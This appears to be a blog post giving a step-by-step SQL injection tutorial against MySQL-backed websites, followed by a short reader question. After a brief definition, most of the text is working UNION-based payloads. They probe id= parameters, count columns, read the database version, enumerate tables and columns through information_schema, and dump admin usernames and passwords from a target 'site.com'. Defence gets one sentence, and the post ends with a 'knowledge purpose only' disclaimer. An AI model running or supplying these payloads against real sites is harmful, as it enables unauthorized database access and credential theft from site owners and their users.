While on the way to Bangalore I decided to post a basic tut for SQL Injection as normally people having knowledge of sqlijection call themselves as Hackers but its not so SQL Injection is just a Trailer I will suggest you for other injection also :) so now lets learn .
SQL Injection
“SQL injection is a type of vulnerability in which the attacker adds SQL statements through a web application's input fields or hidden parameters to gain access to resources or make changes to data.” A resource field is usually considered a column in a database that holds important data about an organization. Validation is key to making sure these SQL statements don’t contain criminal code necessary to illegally obtain unauthorized information. This can be done using any database, as no any one vendor is exempt. “SQL injection is not a defect of Microsoft SQL Server – it is also a problem for every other database vendor as well.” Let’s take a look at how SQL injection works by looking at a simple database with user names and passwords. In a normal database, the table named “Login” would look like Table as given below.
| Command | Function |
| SELECT | Selects rows (records) |
| INSERT INTO | Inserts rows (records) |
| DELETE | Deletes rows (records) |
| UPDATE | Changes rows (records) |
| CREATE TABLE | Creates a new table |
The database is not the only entity that can be affected here; the criminal can also access the network as well as the operating system at this point. SQL statements can be written to bypass the signatures of intrusion detection systems; however the discussion of this goes beyond the scope of this paper. The best defense is to check all input and validate at all tiers
Example
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
Step 1:
When testing for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/id=1
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:
www.site.com/id=1'
If the database is vulnerable, the page will give an error or blank page.
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:
http://www.site.com/id=1 order by 1--
http://www.site.com/id=1 order by 2--
http://www.site.com/id=1 order by 3--
http://www.site.com/id=1 order by 4--
http://www.site.com/id=1 order by 5--
If we receive an error here, then that means we have 4 columns.
Step 3
We now are going to use the "union" command to find the vulnerable columns.
for example:
www.site.com/page=1 union all select 1,2,3,4--
Suppose 2 is shown then our targated column is 2
Step 4
We now need to find the database version. We do this by replacing the vulnerable column numbers with the following query:
For example the url would look like:
www.site.com/page=1 union all select 1,version(),3,4--
or
www.site.com/page=1 union all select 1,@@version,3,4--
The resulting page would then show the database user and then the MySQL version. For example 5.0.83.
Step 5
In this step our aim is to list all the table names in the database.
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Now look for admin tables or member or user tables.
Step 6
In this Step we want to list all the column names in the table we have found for example 'admin', to do this we use the following command:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='admin'--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user, email and password.
Step 7
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here the "concat" command matches up the username with the password so you don’t have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.
This Tut is just for Knowledge purpose not to Harm. If anyone Does than Responsibility is all yours :)
Cheers ....
some times union all select not showing any vulnerable column, in such case what have to do...???
ReplyDelete